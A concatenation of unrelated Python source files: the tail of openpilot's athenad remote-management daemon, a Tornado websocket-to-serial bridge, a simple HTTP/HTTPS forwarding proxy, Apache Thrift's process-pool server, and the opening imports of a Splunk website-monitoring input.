  the response is queued for sending; responses to our own requests
  (containing "id" plus "result"/"error") are forwarded to ``log_recv_queue``.
  Runs until ``end_event`` is set.
  """
  dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
  while not end_event.is_set():
    try:
      data = recv_queue.get(timeout=1)
      if "method" in data:
        cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
        response = JSONRPCResponseManager.handle(data, dispatcher)
        send_queue.put_nowait(response.json)
      elif "id" in data and ("result" in data or "error" in data):
        log_recv_queue.put_nowait(data)
      else:
        raise Exception("not a valid request or response")
    except queue.Empty:
      pass
    except Exception as e:
      cloudlog.exception("athena jsonrpc handler failed")
      send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
  """Requeue the upload owned by worker thread ``tid`` for another attempt.

  The item is pushed back onto ``upload_queue`` -- with ``retry_count`` bumped
  unless ``increase_count`` is False (used for metered-connection deferrals) --
  and the persisted queue cache is refreshed. The worker then backs off for
  RETRY_DELAY seconds, waking early if ``end_event`` is set. Items that have
  exhausted MAX_RETRY_COUNT are dropped, with a log event for visibility.
  """
  item = cur_upload_items[tid]
  if item.retry_count < MAX_RETRY_COUNT:
    new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
    item = item._replace(
      retry_count=new_retry_count,
      progress=0,
      current=False
    )
    upload_queue.put_nowait(item)
    UploadQueueCache.cache(upload_queue)
    cur_upload_items[tid] = None
    # Back off before the next attempt. Event.wait returns as soon as the
    # event is set, unlike the previous one-second sleep loop, so shutdown
    # is not delayed.
    end_event.wait(RETRY_DELAY)
  else:
    # Previously the item was dropped silently; log so lost uploads are visible.
    cloudlog.event("athena.retry_upload.abandoned", item=item, error=True)
def upload_handler(end_event: threading.Event) -> None:
  """Worker loop: pop items from ``upload_queue`` and upload them.

  Skips cancelled and expired items, defers uploads on metered connections
  unless the item allows cellular, aborts in-flight transfers that become
  metered, and requeues failures via ``retry_upload``. Runs until
  ``end_event`` is set.
  """
  sm = messaging.SubMaster(['deviceState'])
  tid = threading.get_ident()
  while not end_event.is_set():
    cur_upload_items[tid] = None
    try:
      cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
      if cur_upload_items[tid].id in cancelled_uploads:
        cancelled_uploads.remove(cur_upload_items[tid].id)
        continue
      # Remove item if too old
      age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
      if age.total_seconds() > MAX_AGE:
        cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
        continue
      # Check if uploading over metered connection is allowed
      sm.update(0)
      metered = sm['deviceState'].networkMetered
      network_type = sm['deviceState'].networkType.raw
      if metered and (not cur_upload_items[tid].allow_cellular):
        # Defer without counting this as a failed attempt.
        retry_upload(tid, end_event, False)
        continue
      try:
        def cb(sz, cur):
          # Abort transfer if connection changed to metered after starting upload
          sm.update(0)
          metered = sm['deviceState'].networkMetered
          if metered and (not cur_upload_items[tid].allow_cellular):
            raise AbortTransferException
          cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
        fn = cur_upload_items[tid].path
        try:
          sz = os.path.getsize(fn)
        except OSError:
          sz = -1
        cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type, metered=metered, retry_count=cur_upload_items[tid].retry_count)
        response = _do_upload(cur_upload_items[tid], cb)
        # 401/403/412 are treated as permanent; don't retry those.
        if response.status_code not in (200, 201, 401, 403, 412):
          cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type, metered=metered)
          retry_upload(tid, end_event)
        else:
          cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type, metered=metered)
        UploadQueueCache.cache(upload_queue)
      except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
        cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type, metered=metered)
        retry_upload(tid, end_event)
      except AbortTransferException:
        cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type, metered=metered)
        retry_upload(tid, end_event, False)
    except queue.Empty:
      pass
    except Exception:
      cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
  """PUT the file for `upload_item` to its URL and return the requests.Response.

  If the stored .bz2 path is missing but the uncompressed file exists, the data
  is bz2-compressed in memory first. When `callback` is given it is wrapped
  around the stream to report transfer progress.
  """
  path = upload_item.path
  compress = False
  # If file does not exist, but does exist without the .bz2 extension we will compress on the fly
  if not os.path.exists(path) and os.path.exists(strip_bz2_extension(path)):
    path = strip_bz2_extension(path)
    compress = True
  with open(path, "rb") as f:
    if compress:
      cloudlog.event("athena.upload_handler.compress", fn=path, fn_orig=upload_item.path)
      data = bz2.compress(f.read())
      size = len(data)
      data = io.BytesIO(data)
    else:
      size = os.fstat(f.fileno()).st_size
      data = f
    if callback:
      data = CallbackReader(data, callback, size)
    return requests.put(upload_item.url,
                        data=data,
                        headers={**upload_item.headers, 'Content-Length': str(size)},
                        timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
  """Return one message from the given cereal service as a dict.

  Raises a generic Exception for an unknown service and TimeoutError when
  nothing arrives within `timeout` milliseconds.
  """
  if service is None or service not in service_list:
    raise Exception("invalid service")
  # NOTE: local name shadows the stdlib `socket` module inside this function
  socket = messaging.sub_sock(service, timeout=timeout)
  ret = messaging.recv_one(socket)
  if ret is None:
    raise TimeoutError
  return ret.to_dict()
@dispatcher.add_method
def getVersion() -> Dict[str, str]:
  """Return version, git remote, branch and commit for this install."""
  return {
    "version": get_version(),
    "remote": get_origin(''),
    "branch": get_short_branch(''),
    "commit": get_commit(default=''),
  }
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
  """Persist a navigation destination to the NavDestination param as JSON."""
  destination = {
    "latitude": latitude,
    "longitude": longitude,
    "place_name": place_name,
    "place_details": place_details,
  }
  Params().put("NavDestination", json.dumps(destination))
  return {"success": 1}
def scan_dir(path, prefix):
  """Recursively collect file paths (relative to ROOT) that match `prefix`.

  Only directories that could contain matches are descended into, unlike
  glob-style helpers that traverse the entire tree.
  """
  found = []
  with os.scandir(path) as entries:
    for entry in entries:
      rel_path = os.path.relpath(entry.path, ROOT)
      if entry.is_dir(follow_symlinks=False):
        # add trailing slash so directory comparisons line up
        rel_path = os.path.join(rel_path, '')
        # descend when either string prefixes the other:
        # a partial dir name means the dir starts with prefix, while a
        # partial file name means prefix starts with the dir path
        if rel_path.startswith(prefix) or prefix.startswith(rel_path):
          found.extend(scan_dir(entry.path, prefix))
      elif rel_path.startswith(prefix):
        found.append(rel_path)
  return found
@dispatcher.add_method
def listDataDirectory(prefix=''):
  """List files under ROOT whose relative path starts with `prefix`."""
  return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
  """Reboot the device, refusing while onroad (deviceState.started)."""
  sock = messaging.sub_sock("deviceState", timeout=1000)
  ret = messaging.recv_one(sock)
  if ret is None or ret.deviceState.started:
    raise Exception("Reboot unavailable")
  def do_reboot():
    # small delay so the RPC response can be delivered first
    time.sleep(2)
    HARDWARE.reboot()
  threading.Thread(target=do_reboot).start()
  return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
  """Single-file convenience wrapper around uploadFilesToUrls."""
  return uploadFilesToUrls([{
    "fn": fn,
    "url": url,
    "headers": headers,
  }])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
  """Queue a batch of files for upload.

  Each entry needs 'fn' (path relative to ROOT) and 'url'; 'headers' and
  'allow_cellular' are optional. Returns the enqueued items plus the names
  that were rejected, if any.
  """
  items = []
  failed = []
  for file in files_data:
    fn = file.get('fn', '')
    # reject empty/absolute paths and traversal attempts; require a target url
    if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
      failed.append(fn)
      continue
    path = os.path.join(ROOT, fn)
    if not os.path.exists(path) and not os.path.exists(strip_bz2_extension(path)):
      failed.append(fn)
      continue
    item = UploadItem(
      path=path,
      url=file['url'],
      headers=file.get('headers', {}),
      created_at=int(time.time() * 1000),
      id=None,
      allow_cellular=file.get('allow_cellular', False),
    )
    # deterministic id derived from the item's contents
    upload_id = hashlib.sha1(str(item).encode()).hexdigest()
    item = item._replace(id=upload_id)
    upload_queue.put_nowait(item)
    items.append(item._asdict())
  # persist the queue so uploads survive a restart
  UploadQueueCache.cache(upload_queue)
  resp = {"enqueued": len(items), "items": items}
  if failed:
    resp["failed"] = failed
  return resp
@dispatcher.add_method
def listUploadQueue():
  """Return queued plus in-flight upload items, excluding cancelled ones."""
  items = list(upload_queue.queue) + list(cur_upload_items.values())
  return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
  """Mark one or more queued upload ids as cancelled.

  Returns the bare integer 404 (not a dict) when no id matched — callers
  depend on this shape.
  """
  if not isinstance(upload_id, list):
    upload_id = [upload_id]
  uploading_ids = {item.id for item in list(upload_queue.queue)}
  cancelled_ids = uploading_ids.intersection(upload_id)
  if len(cancelled_ids) == 0:
    return 404
  cancelled_uploads.update(cancelled_ids)
  return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
  """No-op acknowledgement of a prime-activation notification."""
  return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
  """Apply network bandwidth limits (AGNOS only).

  NOTE: the method name misspells "Bandwidth" but is part of the public RPC
  surface and must not be renamed.
  """
  if not AGNOS:
    return {"success": 0, "error": "only supported on AGNOS"}
  try:
    HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
    return {"success": 1}
  except subprocess.CalledProcessError as e:
    return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
  """Bridge a remote websocket to a whitelisted local TCP port.

  Spawns a recv thread and a send thread; the socketpair lets the send side
  learn when the recv side shuts down.
  """
  try:
    if local_port not in LOCAL_PORT_WHITELIST:
      raise Exception("Requested local port not whitelisted")
    cloudlog.debug("athena.startLocalProxy.starting")
    dongle_id = Params().get("DongleId").decode('utf8')
    identity_token = Api(dongle_id).get_token()
    ws = create_connection(remote_ws_uri,
                           cookie="jwt=" + identity_token,
                           enable_multithread=True)
    # ssock/csock form the shutdown-signal channel between the two threads
    ssock, csock = socket.socketpair()
    local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_sock.connect(('127.0.0.1', local_port))
    local_sock.setblocking(False)
    proxy_end_event = threading.Event()
    threads = [
      threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
      threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
    ]
    for thread in threads:
      thread.start()
    cloudlog.debug("athena.startLocalProxy.started")
    return {"success": 1}
  except Exception as e:
    cloudlog.exception("athenad.startLocalProxy.exception")
    raise e
@dispatcher.add_method
def getPublicKey():
  """Return the device's RSA public key contents, or None when absent."""
  key_path = PERSIST + '/comma/id_rsa.pub'
  if not os.path.isfile(key_path):
    return None
  with open(key_path) as f:
    return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
  """Return the stored GitHub SSH keys, or an empty string if unset."""
  return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
  """Return SIM card info from the hardware abstraction layer."""
  return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
  """Return the current network type (wifi/cell/none)."""
  return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworkMetered():
  """Return whether the current network connection is metered."""
  network_type = HARDWARE.get_network_type()
  return HARDWARE.get_network_metered(network_type)
@dispatcher.add_method
def getNetworks():
  """Return the list of available networks."""
  return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
  """Capture camera snapshots and return them as base64-encoded JPEGs.

  Only available while camerad is not running; raises otherwise.
  """
  # imported lazily so the daemon doesn't pull in camera deps at startup
  from system.camerad.snapshot.snapshot import jpeg_write, snapshot
  ret = snapshot()
  if ret is not None:
    def b64jpeg(x):
      # encode a single frame; missing frames pass through as None
      if x is not None:
        f = io.BytesIO()
        jpeg_write(f, x)
        return base64.b64encode(f.getvalue()).decode("utf-8")
      else:
        return None
    return {'jpegBack': b64jpeg(ret[0]),
            'jpegFront': b64jpeg(ret[1])}
  else:
    raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
  """Return sorted swaglog filenames that still need uploading.

  A file's send timestamp is stored in an xattr; files never sent, or sent
  more than an hour ago without confirmation, are considered pending. The
  newest (active) log file is excluded.
  """
  # TODO: scan once then use inotify to detect file creation/deletion
  curr_time = int(time.time())
  logs = []
  for log_entry in os.listdir(SWAGLOG_DIR):
    log_path = os.path.join(SWAGLOG_DIR, log_entry)
    try:
      time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
    except (ValueError, TypeError):
      time_sent = 0
    # assume send failed and we lost the response if sent more than one hour ago
    if not time_sent or curr_time - time_sent > 3600:
      logs.append(log_entry)
  # excluding most recent (active) log file
  return sorted(logs)[:-1]
def log_handler(end_event):
  """Forward swaglog files to the backend one at a time via forwardLogs RPC.

  Marks each file's xattr on send, and again (with the max sentinel) on a
  confirmed response so it is not re-sent. Currently disabled via the early
  return below.
  """
  # dont upload any logs for now
  if True:
    return
  log_files = []
  last_scan = 0
  while not end_event.is_set():
    try:
      curr_scan = sec_since_boot()
      # rescan the log directory at most every 10 seconds
      if curr_scan - last_scan > 10:
        log_files = get_logs_to_send_sorted()
        last_scan = curr_scan
      # send one log
      curr_log = None
      if len(log_files) > 0:
        log_entry = log_files.pop()  # newest log file
        cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
        try:
          curr_time = int(time.time())
          log_path = os.path.join(SWAGLOG_DIR, log_entry)
          # record the send attempt so it isn't retried for an hour
          setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
          with open(log_path) as f:
            jsonrpc = {
              "method": "forwardLogs",
              "params": {
                "logs": f.read()
              },
              "jsonrpc": "2.0",
              "id": log_entry
            }
          low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
          curr_log = log_entry
        except OSError:
          pass  # file could be deleted by log rotation
      # wait for response up to ~100 seconds
      # always read queue at least once to process any old responses that arrive
      for _ in range(100):
        if end_event.is_set():
          break
        try:
          log_resp = json.loads(log_recv_queue.get(timeout=1))
          log_entry = log_resp.get("id")
          log_success = "result" in log_resp and log_resp["result"].get("success")
          cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
          if log_entry and log_success:
            log_path = os.path.join(SWAGLOG_DIR, log_entry)
            try:
              # sentinel timestamp: this log is fully delivered
              setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
            except OSError:
              pass  # file could be deleted by log rotation
          if curr_log == log_entry:
            break
        except queue.Empty:
          if curr_log is None:
            break
    except Exception:
      cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event: threading.Event) -> None:
  """Forward one stats file from STATS_DIR to the backend every ~10 seconds.

  Fix: `last_scan` was reset to 0 inside the while loop, so the 10-second
  throttle condition was always true and the directory was rescanned every
  0.1 s. It is now initialized once, before the loop.
  """
  last_scan = 0.
  while not end_event.is_set():
    curr_scan = sec_since_boot()
    try:
      if curr_scan - last_scan > 10:
        # skip temp files that are still being written
        stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
        if len(stat_filenames) > 0:
          stat_path = os.path.join(STATS_DIR, stat_filenames[0])
          with open(stat_path) as f:
            jsonrpc = {
              "method": "storeStats",
              "params": {
                "stats": f.read()
              },
              "jsonrpc": "2.0",
              "id": stat_filenames[0]
            }
          low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
          os.remove(stat_path)
        last_scan = curr_scan
    except Exception:
      cloudlog.exception("athena.stat_handler.exception")
    time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
  """Pump bytes from the websocket into the local socket until either side ends.

  On exit it closes both sockets and sets end_event so ws_proxy_send stops too.
  """
  while not (end_event.is_set() or global_end_event.is_set()):
    try:
      data = ws.recv()
      local_sock.sendall(data)
    except WebSocketTimeoutException:
      pass
    except Exception:
      cloudlog.exception("athenad.ws_proxy_recv.exception")
      break
  cloudlog.debug("athena.ws_proxy_recv closing sockets")
  # closing ssock wakes ws_proxy_send's select() as the end signal
  ssock.close()
  local_sock.close()
  cloudlog.debug("athena.ws_proxy_recv done closing sockets")
  end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
  """Pump bytes from the local socket to the websocket as binary frames.

  select() watches both the data socket and the signal socket; activity on
  the signal socket means ws_proxy_recv has shut down.
  """
  while not end_event.is_set():
    try:
      r, _, _ = select.select((local_sock, signal_sock), (), ())
      if r:
        if r[0].fileno() == signal_sock.fileno():
          # got end signal from ws_proxy_recv
          end_event.set()
          break
        data = local_sock.recv(4096)
        if not data:
          # local_sock is dead
          end_event.set()
          break
        ws.send(data, ABNF.OPCODE_BINARY)
    except Exception:
      cloudlog.exception("athenad.ws_proxy_send.exception")
      end_event.set()
  cloudlog.debug("athena.ws_proxy_send closing sockets")
  signal_sock.close()
  cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
  """Receive loop: push incoming frames onto recv_queue and track server pings.

  If no ping is seen for RECONNECT_TIMEOUT_S the connection is considered
  dead and end_event is set so the caller reconnects.
  """
  last_ping = int(sec_since_boot() * 1e9)  # nanoseconds
  while not end_event.is_set():
    try:
      opcode, data = ws.recv_data(control_frame=True)
      if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
        if opcode == ABNF.OPCODE_TEXT:
          data = data.decode("utf-8")
        recv_queue.put_nowait(data)
      elif opcode == ABNF.OPCODE_PING:
        last_ping = int(sec_since_boot() * 1e9)
        Params().put("LastAthenaPingTime", str(last_ping))
    except WebSocketTimeoutException:
      ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
      if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
        cloudlog.exception("athenad.ws_recv.timeout")
        end_event.set()
    except Exception:
      cloudlog.exception("athenad.ws_recv.exception")
      end_event.set()
def ws_send(ws, end_event):
  """Send loop: drain send_queue first, then low_priority_send_queue.

  Large payloads are fragmented into WS_FRAME_SIZE chunks using websocket
  continuation frames.
  """
  while not end_event.is_set():
    try:
      try:
        data = send_queue.get_nowait()
      except queue.Empty:
        data = low_priority_send_queue.get(timeout=1)
      for i in range(0, len(data), WS_FRAME_SIZE):
        frame = data[i:i+WS_FRAME_SIZE]
        last = i + WS_FRAME_SIZE >= len(data)
        # first fragment is TEXT, the rest are CONT
        opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
        ws.send_frame(ABNF.create_frame(frame, opcode, last))
    except queue.Empty:
      pass
    except Exception:
      cloudlog.exception("athenad.ws_send.exception")
      end_event.set()
def backoff(retries):
  """Return a random reconnect delay in [0, 2**retries), capped at 127 seconds."""
  upper = min(128, int(2 ** retries))
  return random.randrange(0, upper)
def main():
  """Daemon entry point: connect to the Athena websocket, reconnecting with
  randomized exponential backoff on failure."""
  try:
    set_core_affinity([0, 1, 2, 3])
  except Exception:
    cloudlog.exception("failed to set core affinity")
  params = Params()
  dongle_id = params.get("DongleId", encoding='utf-8')
  UploadQueueCache.initialize(upload_queue)
  ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
  api = Api(dongle_id)
  conn_retries = 0
  while 1:
    try:
      cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
      ws = create_connection(ws_uri,
                             cookie="jwt=" + api.get_token(),
                             enable_multithread=True,
                             timeout=30.0)
      cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
      conn_retries = 0
      cur_upload_items.clear()
      handle_long_poll(ws)
    except (KeyboardInterrupt, SystemExit):
      break
    except (ConnectionError, TimeoutError, WebSocketException):
      conn_retries += 1
      params.delete("LastAthenaPingTime")
    except socket.timeout:
      # plain timeout: retry without growing the backoff window
      params.delete("LastAthenaPingTime")
    except Exception:
      cloudlog.exception("athenad.main.exception")
      conn_retries += 1
      params.delete("LastAthenaPingTime")
    time.sleep(backoff(conn_retries))
# Script entry point
if __name__ == "__main__":
  main()
|
tornadoWebControl.py
|
import tornado.web
import tornado.websocket
import tornado.ioloop
import os
import sys
import serial
import time
import threading
#host=os.environ['IP']
#port=os.environ['PORT']
host="*"  # listen on all interfaces
port="8080"  # HTTP/websocket listen port
#PORT = "loop://logging=debug"
PORT = "/dev/ttyACM0"  # serial device bridged to the websocket
TIMEOUT = 1  # serial read timeout in seconds
class Application(tornado.web.Application):
    """Tornado app wiring the index page and the slider websocket routes."""
    def __init__(self):
        handlers = [
            (r"/", MainHandler),
            (r"/sliderssocket", SlidersSocket),
        ]
        settings = dict(
            cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
            template_path=os.path.join(os.path.dirname(__file__), "templates"),
            static_path=os.path.join(os.path.dirname(__file__), "static"),
            xsrf_cookies=True,
        )
        tornado.web.Application.__init__(self, handlers, **settings)
class MainHandler(tornado.web.RequestHandler):
    """Serves the control UI landing page."""
    def get(self):
        # render the main template from the configured template_path
        self.render("index.html")
class SlidersSocket(tornado.websocket.WebSocketHandler):
    """Websocket handler bridging browser messages to a serial port.

    A daemon reader thread forwards each serial line back over the websocket.
    NOTE: Python 2 code (print statements).
    """
    def __init__(self, app, request, **kwargs):
        tornado.websocket.WebSocketHandler.__init__(self, app, request, **kwargs)
        self.serial = serial.serial_for_url(PORT, timeout=TIMEOUT)
        self.alive = True
        self.thread_read = threading.Thread(target=self.reader)
        self.thread_read.setDaemon(True)
        self.thread_read.setName('read serial')
        self.thread_read.start()
    def reader(self):
        """Loop forever, pushing serial lines to the websocket client."""
        while self.alive:
            try:
                data = self.serial.readline() # read one line, blocking
                if data:
                    self.write_message( data )
            except:
                # NOTE(review): bare except catches everything, including
                # system-exiting exceptions; the error is logged then re-raised
                sys.stderr.write('ERROR: %s\n' % sys.exc_info()[0] )
                raise
        self.alive = False
    def open(self):
        print "WebSocket opened"
    def on_message(self, message):
        # forward browser input to the serial device, newline terminated
        #self.write_message(u"Sending to Serial port: <" + message +">")
        self.serial.write(message+'\n')
    def on_close(self):
        print "WebSocket closed"
# Start the tornado server on the configured host/port
if __name__ == "__main__":
    app = Application()
    app.listen(port, host)
    tornado.ioloop.IOLoop.instance().start()
|
proxy-server.py
|
import socket
from threading import Thread
import requests
serverSocket = socket.socket()  # Create socket
localHostIp = "0.0.0.0"  # work for all ips of the server
port = 2874  # proxy listen port
# Reserve port
serverSocket.bind((localHostIp, port))
# Listen to up to 15 client connections
serverSocket.listen(15)
allThreads = set()  # Store records of all threads
buffer = 2048  # Buffer size in bytes for socket reads (shadows builtin `buffer` on py2)
def handle_client_connection(client_socket, client_address):
    """Read the client's full request header, then dispatch by HTTP method.

    GET requests are proxied as plain HTTP; everything else (e.g. CONNECT)
    is treated as an HTTPS tunnel.
    """
    client_header = ""
    while True:
        data = client_socket.recv(buffer)  # Receive request from client
        try:
            client_header += data.decode("utf-8")
        except UnicodeDecodeError:
            # non-text payload: stop accumulating header data
            break
        if len(data) < buffer:
            break
    list_header = list(map(str, client_header.strip().split("\r\n")))  # Split headers
    # Handle either HTTP or HTTPS request
    if list(map(str, list_header[0].split(" ")))[0].strip() == "GET":
        handle_http_request(client_socket, list_header)
    else:
        handle_https_request(client_socket, client_header, list_header)
def handle_http_request(client_socket, list_header):
    """Fetch the requested URL over plain HTTP and relay the body to the client.

    list_header[0] is the request line, e.g. "GET http://host/path HTTP/1.1".
    """
    url = list_header[0].split(" ")[1]
    web_request = requests.get(url)  # Get
    # 200 OK
    if web_request.status_code == 200:
        response = "HTTP/1.1 200 OK\r\nProxy-Agent: simple-proxy-server\r\n\r\n"
        client_socket.send(response.encode("utf-8"))
        client_socket.sendall(web_request.text.encode("utf-8"))
    else:
        # 404 Not Found
        # Fix: the original literal contained "\r\Website" — an invalid "\W"
        # escape left literally in the bytes, so the header block was never
        # terminated with CRLF CRLF before the body.
        response = "HTTP/1.1 404 Not Found\r\nProxy-Agent: simple-proxy-server\r\n\r\nWebsite not Found\r\n"
        client_socket.send(response.encode("utf-8"))
def handle_https_request(client_socket, client_header, list_header):
    """Establish an HTTPS tunnel: connect to the target's port 443 and relay.

    A helper thread forwards client->server bytes while this function
    forwards server->client bytes until either side stops sending.
    """
    web_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # request line looks like "CONNECT host:port HTTP/1.1"
        web_host = list(map(str, list_header[0].split(" ")))[1]
        web_host = list(map(str, web_host.split(":")))[0]
    except IndexError:
        print("Index error while fetching https request")
        return
    try:
        web_host_ip = socket.gethostbyname(web_host)
    except socket.gaierror:
        print("Unknown host error while fetching https request")
        return
    # 200 OK
    web_server_socket.connect((web_host_ip, 443))
    response = "HTTP/1.1 200 Connection Established\r\nProxy-Agent: simple-proxy-server\r\n\r\n"
    client_socket.send(response.encode("utf-8"))
    transfer_thread = Thread(target=client_to_server_transfer, args=(client_socket, web_server_socket))
    transfer_thread.setDaemon(True)
    transfer_thread.start()
    # relay server -> client until the server stops sending
    while True:
        server_data = web_server_socket.recv(buffer)
        client_socket.send(server_data)
        if len(server_data) < 1:
            break
def client_to_server_transfer(client_socket, web_server_socket):
    """Relay bytes from the client to the remote server until the client stops sending."""
    while True:
        chunk = client_socket.recv(buffer)
        web_server_socket.send(chunk)
        if not chunk:
            break
# Main accept loop: spawn one handler thread per incoming client connection
while True:
    client_socket, client_address = serverSocket.accept()  # Connection with client
    # Create new thread for handling client requests
    print("Connection accepted from ", client_address)
    thread = Thread(target=handle_client_connection, args=(client_socket, client_address))
    allThreads.add(thread)  # Add thread to the list
    thread.start()
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import collections
logger = logging.getLogger(__name__)
from multiprocessing import Process, Value, Condition, reduction
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
    """Server with a fixed size pool of worker subprocesses to service requests

    Note that if you need shared state between the handlers - it's up to you!
    Written by Dvir Volk, doat.com
    """
    def __init__(self, *args):
        TServer.__init__(self, *args)
        self.numWorkers = 10
        self.workers = []
        # shared flag: worker processes leave their accept loop when False
        self.isRunning = Value('b', False)
        self.stopCondition = Condition()
        self.postForkCallback = None

    def setPostForkCallback(self, callback):
        """Register a callable to run in each worker immediately after fork."""
        # Fix: `collections.Callable` was removed in Python 3.10; the builtin
        # callable() performs the identical check on every Python 3 version.
        if not callable(callback):
            raise TypeError("This is not a callback!")
        self.postForkCallback = callback

    def setNumWorkers(self, num):
        """Set the number of worker processes that should be created"""
        self.numWorkers = num

    def workerProcess(self):
        """Loop accepting clients from the shared transport and serving them"""
        if self.postForkCallback:
            self.postForkCallback()
        while self.isRunning.value:
            try:
                client = self.serverTransport.accept()
                if not client:
                    continue
                self.serveClient(client)
            except (KeyboardInterrupt, SystemExit):
                return 0
            except Exception as x:
                logger.exception(x)

    def serveClient(self, client):
        """Process input/output from a client for as long as possible"""
        itrans = self.inputTransportFactory.getTransport(client)
        otrans = self.outputTransportFactory.getTransport(client)
        iprot = self.inputProtocolFactory.getProtocol(itrans)
        oprot = self.outputProtocolFactory.getProtocol(otrans)
        try:
            while True:
                self.processor.process(iprot, oprot)
        except TTransportException:
            # client disconnected: normal end of a session
            pass
        except Exception as x:
            logger.exception(x)
        itrans.close()
        otrans.close()

    def serve(self):
        """Start workers, then block until stop() signals the condition"""
        # this is a shared state that can tell the workers to exit when False
        self.isRunning.value = True
        # first bind and listen to the port
        self.serverTransport.listen()
        # fork the children
        for i in range(self.numWorkers):
            try:
                w = Process(target=self.workerProcess)
                w.daemon = True
                w.start()
                self.workers.append(w)
            except Exception as x:
                logger.exception(x)
        # wait until the condition is set by stop()
        while True:
            self.stopCondition.acquire()
            try:
                self.stopCondition.wait()
                break
            except (SystemExit, KeyboardInterrupt):
                break
            except Exception as x:
                logger.exception(x)
        self.isRunning.value = False

    def stop(self):
        """Signal serve() to wake up and begin shutdown."""
        self.isRunning.value = False
        self.stopCondition.acquire()
        self.stopCondition.notify()
        self.stopCondition.release()
|
web_ping.py
|
"""
This module defines the Website Monitoring web_ping modular input.
"""
import os
import sys
path_to_mod_input_lib = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'modular_input.zip')
sys.path.insert(0, path_to_mod_input_lib)
from modular_input import Field, ModularInput, URLField, DurationField, IntegerField, BooleanField, RangeField
from modular_input.shortcuts import forgive_splunkd_outages
from modular_input.secure_password import get_secure_password
from modular_input.server_info import ServerInfo
from splunk.models.field import Field as ModelField
from splunk.models.field import IntField as ModelIntField
import splunk
import re
import hashlib
import time
import json
import threading
import logging
import socket
from six.moves.urllib.request import getproxies
from six import text_type, binary_type
from website_monitoring_app import socks
from website_monitoring_app import requests
from website_monitoring_app.requests_ntlm import HttpNtlmAuth
